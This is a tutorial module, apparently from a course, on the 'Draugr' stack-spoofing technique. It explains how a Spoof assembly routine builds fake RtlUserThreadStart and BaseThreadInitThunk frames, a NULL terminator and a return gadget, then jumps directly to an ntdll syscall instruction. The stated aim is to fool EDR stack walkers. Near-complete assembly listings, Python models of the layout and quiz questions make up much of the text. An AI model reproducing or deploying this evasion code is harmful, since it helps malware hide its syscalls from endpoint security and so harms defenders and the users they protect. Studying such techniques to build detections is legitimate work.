Module 6: Synthetic Frame Construction
Building a three-layer fake stack that survives full unwinding — one precise sub rsp at a time.
Module Overview
This is the core of Draugr. The Spoof assembly routine constructs a three-layer synthetic stack beneath the current execution point. Each layer represents a fake call frame for a legitimate Windows function. When the syscall executes and an EDR walks the stack, it sees the current function called through BaseThreadInitThunk, which was in turn called by RtlUserThreadStart: the same two base frames found at the bottom of a normally started thread. This module walks through each layer, byte by byte.
The Three-Layer Stack Layout
The synthetic stack is constructed from the bottom up (highest address to lowest). The final RSP after construction points to the very top — the gadget address that will be popped by RET after the syscall returns.
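Complete Synthetic Stack (Top to Bottom)
- Gadget address (lowest address; RSP points here)
- BaseThreadInitThunk frame (return address BaseThreadInitThunk+0x14)
- RtlUserThreadStart frame (return address RtlUserThreadStart+0x21)
- 0x200 reserved buffer
- NULL terminator (highest address)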
Construction Order
The stack grows downward on x64 (lower addresses = newer frames). Draugr builds from the bottom up:
- NULL terminator — pushed first (highest address)
- 0x200 buffer — RSP decremented by 512 bytes
- RtlUserThreadStart frame — RSP decremented by calculated frame size
- BaseThreadInitThunk frame — RSP decremented by calculated frame size
- Gadget address — pushed last (lowest address, top of stack)
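As a rough illustration of the construction order above, the following Python sketch models only the pointer arithmetic, not the real routine. The function name `layout`, the starting RSP value, and both frame sizes are hypothetical placeholders; the real sizes come from each function's unwind data.

```python
def layout(start_rsp, ruts_size, btit_size):
    """Return (label, rsp) pairs in construction order.

    Models only how RSP moves for each step in the list above.
    All inputs are hypothetical values chosen by the caller.
    """
    rsp = start_rsp
    steps = []

    rsp -= 8            # push of the NULL terminator (one 8-byte slot)
    steps.append(("NULL terminator", rsp))

    rsp -= 0x200        # 512-byte reserved buffer
    steps.append(("0x200 buffer", rsp))

    rsp -= ruts_size    # RtlUserThreadStart frame
    steps.append(("RtlUserThreadStart frame", rsp))

    rsp -= btit_size    # BaseThreadInitThunk frame
    steps.append(("BaseThreadInitThunk frame", rsp))

    rsp -= 8            # push of the gadget address (top of stack)
    steps.append(("gadget address", rsp))
    return steps


if __name__ == "__main__":
    # Made-up starting RSP and frame sizes, for illustration only.
    for label, addr in layout(0x10000, 0x48, 0x30):
        print(f"{addr:#08x}  {label}")
```

Each step lands at a lower address than the one before it, which is why the element pushed last ends up at the top of the stack.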
Layer 1: The Reserved Buffer (0x200 Bytes)
The first allocation after the NULL terminator is a 512-byte reserved buffer at the base of the synthetic stack.
ASM - Buffer allocation
; Push NULL terminator first (base of stack)
xor rax, rax
push rax ; [rsp] = 0x0 (NULL)
; Allocate 0x200 bytes of buffer space
sub rsp, 0x200 ; RSP -= 512
Purpose of the Buffer
This 512-byte region provides working space and separation between the NULL terminator and the synthetic frames. Some stack-walking implementations may read memory beyond the last frame they unwind; the buffer makes it more likely that such reads land in benign stack memory rather than unmapped pages. Note that sub rsp only moves the stack pointer, so the region holds whatever was previously there unless it is cleared explicitly. The buffer also provides alignment padding and keeps the synthetic frames from sitting immediately adjacent to the stack terminator, which could look suspicious under heuristic analysis.
Layer 2: RtlUserThreadStart Frame
The second layer creates a fake frame for ntdll!RtlUserThreadStart. This is the function that Windows calls to start every user-mode thread. Its frame sits at the bottom of every legitimate call stack.
ASM - RtlUserThreadStart synthetic frame
; Load RtlUserThreadStart frame size from PRM
mov r12, [rbx + 0x48] ; R12 = RtlUserThreadStart_Size
; Allocate the frame
sub rsp, r12 ; RSP -= frame size
; Write the fake return address at the top of this frame
mov r13, [rbx + 0x58] ; R13 = RtlUserThreadStart + 0x21
mov [rsp], r13 ; [RSP] = fake return address
What This Creates
After this code executes, the stack contains a frame that is exactly the size that Windows expects for RtlUserThreadStart. At the top of this frame (lowest address) sits the return address RtlUserThreadStart+0x21. When the stack unwinder processes this frame, it reads the return address, looks up the RUNTIME_FUNCTION for the address, and uses the UNWIND_CODEs to determine how many bytes to skip. Because Draugr calculated the exact same size from the exact same UNWIND_CODEs, the unwinder lands precisely at the NULL terminator — the expected end of the stack.
Layer 3: BaseThreadInitThunk Frame
On top of the RtlUserThreadStart frame, Draugr builds the kernel32!BaseThreadInitThunk frame. In a real thread, this function is called by RtlUserThreadStart and in turn calls the thread's entry point.
ASM - BaseThreadInitThunk synthetic frame
; Load BaseThreadInitThunk frame size from PRM
mov r14, [rbx + 0x40] ; R14 = BaseThreadInitThunk_Size
; Allocate the frame
sub rsp, r14 ; RSP -= frame size
; Write the fake return address at the top of this frame
mov r15, [rbx + 0x50] ; R15 = BaseThreadInitThunk + 0x14
mov [rsp], r15 ; [RSP] = fake return address
Frame Chain
Now the stack unwinder sees a chain: the current frame's return address is BaseThreadInitThunk+0x14. Unwinding that frame (by its UNWIND_CODEs) reveals a return address of RtlUserThreadStart+0x21. Unwinding that frame reveals the NULL terminator. This mirrors the base of a real thread's stack, so a walker that checks only return addresses and unwind metadata finds nothing out of place in this chain. Checks that look at other signals are outside what this layout addresses.
Unwinder's View of the Synthetic Stack
ret = BaseThreadInitThunk+0x14
ret = RtlUserThreadStart+0x21
ret = 0x0 (NULL)
NULL = end of stack
The Gadget Frame
The final element placed on the stack is the gadget address. This sits at the very top of the synthetic stack (the lowest address). When the syscall returns, the RET instruction that follows syscall in ntdll pops this address into RIP.
ASM - Pushing the gadget
; Load gadget address from PRM
mov rax, [rbx + 0x60] ; RAX = gadget address (JMP [RBX])
; Push it as the return address for the syscall
push rax ; [RSP] = gadget address
Critical Ordering
The gadget address must be the last thing pushed. RSP points to it at the time the syscall instruction executes. When the syscall returns, RET pops the top of the stack into RIP. If the gadget is not at the top, the CPU would jump to the wrong address — either a fake return address or garbage — and crash immediately.
The NULL Terminator
A zero value (0x0) is placed at the very bottom of the synthetic stack, which is its highest address, beneath the 0x200 buffer in the stack diagram. This serves as a stack walk terminator.
Why NULL Stops the Walk
Windows stack walking functions like RtlWalkFrameChain and RtlCaptureStackBackTrace iterate through frames by following return addresses. When they encounter a return address of 0x0, they interpret it as the end of the stack and stop. Without this terminator, the walker would continue past the synthetic frames into uncontrolled memory — either reading garbage that exposes the spoof, or causing an access violation.
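The termination rule can be modelled in a few lines of Python. This is a toy model, not how RtlWalkFrameChain is implemented: `memory` is a hypothetical dictionary standing in for stack memory, `frame_sizes` maps a return address to the number of bytes its function allocated (excluding the return-address slot), and every address is made up.

```python
def walk(memory, rsp, frame_sizes, max_frames=64):
    """Follow return addresses upward until a NULL one is read.

    memory      -- dict of address -> 8-byte value (toy stack memory)
    rsp         -- address of the first return address to read
    frame_sizes -- dict of return address -> bytes allocated by that function
    """
    trace = []
    for _ in range(max_frames):
        ret = memory[rsp]       # KeyError models a read outside known memory
        if ret == 0:            # NULL return address: end of the stack
            break
        trace.append(ret)
        # Skip the return-address slot, then the function's own allocation.
        rsp += 8 + frame_sizes[ret]
    return trace


if __name__ == "__main__":
    sizes = {0xAAA: 0x28, 0xBBB: 0x48}                 # made-up frame sizes
    mem = {0x1000: 0xAAA, 0x1030: 0xBBB, 0x1080: 0}    # made-up stack contents
    print([hex(r) for r in walk(mem, 0x1000, sizes)])
```

If the zero entry is removed from `mem`, the model raises `KeyError` on the third read, which stands in for the walker running past the last frame into memory that nobody prepared.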
Real Threads Have This Too
On a genuine Windows thread, the bottom of the stack also terminates with a NULL return address. The OS sets this up when it creates the thread's stack. Draugr replicates this behavior, so the termination condition matches that of a real stack.
Stack Argument Copying
The x64 Windows calling convention passes the first four arguments in registers (RCX, RDX, R8, R9). Arguments 5 and beyond are passed on the stack. When Draugr replaces the real stack with the synthetic one, any stack-based arguments must be copied to the correct positions in the new stack.
ASM - Stack argument copying (for >4 argument syscalls)
; The PRM contains all arguments at offset 0x78+
; Arguments 1-4 go in registers (handled separately)
; Arguments 5+ must be placed on the stack at [RSP+0x28], [RSP+0x30], etc.
; Register arguments (args 1-4) are read from the PRM
mov rcx, [rbx + 0x78] ; arg1 (must end up in R10 for the syscall itself)
mov rdx, [rbx + 0x80] ; arg2 (RDX)
mov r8, [rbx + 0x88] ; arg3 (R8)
mov r9, [rbx + 0x90] ; arg4 (R9)
; Copy stack arguments (arg5, arg6, ...) to the synthetic stack
; Stack slots at [RSP+0x28], [RSP+0x30], [RSP+0x38], ...
mov rax, [rbx + 0x98] ; arg5
mov [rsp + 0x28], rax
mov rax, [rbx + 0xA0] ; arg6
mov [rsp + 0x30], rax
; ... additional arguments as needed
Why 0x28 and Not 0x20?
The x64 calling convention reserves 32 bytes (0x20) of shadow space on the stack above the return address. Arguments 5+ start at [RSP + 0x28] (shadow space + 8 bytes for the return address). Draugr must respect this layout exactly, or the kernel function will read the wrong values for parameters 5 and beyond. Functions like NtAllocateVirtualMemory take 6 arguments, so getting this right is critical.
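The offset rule can be written as a one-line formula. The Python sketch below simply restates the arithmetic from the paragraph above; the function and constant names are illustrative and do not come from Draugr.

```python
RETURN_SLOT = 8      # the return address at [RSP]
SHADOW_SPACE = 0x20  # four 8-byte home slots for the register arguments


def stack_arg_offset(n):
    """Offset from RSP of the n-th argument (1-based), for n >= 5."""
    if n < 5:
        raise ValueError("arguments 1-4 are passed in registers")
    return RETURN_SLOT + SHADOW_SPACE + 8 * (n - 5)


if __name__ == "__main__":
    for n in (5, 6, 7):
        print(f"arg{n} -> [RSP + {stack_arg_offset(n):#x}]")
```

For a six-argument call this gives the two slots used in the listing above, 0x28 and 0x30.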
Assembly Walkthrough: Complete Construction
Here is the full sequence from the Spoof routine that builds the synthetic stack, loads register arguments, and jumps to the syscall instruction. Read top to bottom — each instruction is annotated with its purpose.
ASM - Stub.s: Synthetic Stack Construction
; ---- Save original state ----
mov rbx, rcx ; RBX = &PRM (anchor pointer)
mov rax, [rsp] ; Save original return address
mov [rbx + 0x08], rax ; PRM.OG_retaddr = original return
; ---- Save non-volatile registers ----
mov [rbx + 0x10], rdi
mov [rbx + 0x18], rsi
mov [rbx + 0x20], r12
mov [rbx + 0x28], r13
mov [rbx + 0x30], r14
mov [rbx + 0x38], r15
; ---- Layer 0: NULL terminator ----
xor rax, rax
push rax ; Stack bottom = 0x0
; ---- Layer 1: Reserved buffer ----
sub rsp, 0x200 ; 512 bytes of padding
; ---- Layer 2: RtlUserThreadStart frame ----
mov r12, [rbx + 0x48] ; R12 = RtlUserThreadStart frame size
sub rsp, r12 ; Allocate frame
mov r13, [rbx + 0x58] ; R13 = RtlUserThreadStart + 0x21
mov [rsp], r13 ; Write fake return address
; ---- Layer 3: BaseThreadInitThunk frame ----
mov r14, [rbx + 0x40] ; R14 = BaseThreadInitThunk frame size
sub rsp, r14 ; Allocate frame
mov r15, [rbx + 0x50] ; R15 = BaseThreadInitThunk + 0x14
mov [rsp], r15 ; Write fake return address
; ---- Gadget: top of stack ----
mov rax, [rbx + 0x60] ; RAX = gadget address (JMP [RBX])
push rax ; RSP now points to gadget
; ---- Load syscall arguments into registers ----
mov r10, [rbx + 0x78] ; R10 = arg1 (R10, not RCX for syscall)
mov rdx, [rbx + 0x80] ; RDX = arg2
mov r8, [rbx + 0x88] ; R8 = arg3
mov r9, [rbx + 0x90] ; R9 = arg4
; ---- Load SSN and jump to syscall ----
mov rax, [rbx + 0x68] ; RAX = System Service Number
mov r11, [rbx + 0x70] ; R11 = syscall instruction address
jmp r11 ; Jump to: syscall; ret in ntdll
Why R10 Instead of RCX?
In the Windows syscall convention, the kernel expects the first argument in R10, not RCX. This is because the syscall instruction itself overwrites RCX with the return address (the RIP of the next instruction) and R11 with RFLAGS. The standard ntdll stub does mov r10, rcx before the syscall. Since Draugr jumps directly to the syscall instruction (bypassing the stub preamble), it must place the first argument in R10 manually.
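The register effect can be shown with a small Python model. It assumes only the documented behaviour of the x64 SYSCALL instruction (RCX receives the address of the next instruction and R11 receives RFLAGS); the function name and all register values are illustrative.

```python
def after_syscall_entry(regs, next_rip, rflags):
    """Return a copy of regs as they look once SYSCALL has executed."""
    seen = dict(regs)          # leave the caller's dictionary untouched
    seen["rcx"] = next_rip     # SYSCALL saves the return RIP in RCX
    seen["r11"] = rflags       # SYSCALL saves RFLAGS in R11
    return seen


if __name__ == "__main__":
    # Made-up values: arg1 is held in both RCX and R10 before the instruction.
    before = {"rcx": 0x1111, "r10": 0x1111, "rdx": 2, "r8": 3, "r9": 4, "r11": 0}
    after = after_syscall_entry(before, next_rip=0x7FFE0000, rflags=0x246)
    print(hex(after["rcx"]), hex(after["r10"]))
```

In the model, the value placed in RCX is lost while the copy in R10 survives, which is the reason the first argument travels in R10.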
Why JMP Instead of CALL?
The Spoof routine uses jmp r11 (not call r11) to reach the syscall instruction. A CALL would push an additional return address onto the stack, misaligning the carefully constructed synthetic stack. The JMP transfers control without modifying RSP. The syscall instruction in ntdll is followed by RET, which will pop the gadget address from RSP — exactly as intended.
Module 6 Quiz: Synthetic Frame Construction
Q1: In what order are the synthetic stack layers constructed (first pushed to last pushed)?
Q2: What is the purpose of the NULL terminator at the bottom of the synthetic stack?
Q3: Why must each synthetic frame be exactly the size calculated from the target function's UNWIND_CODEs?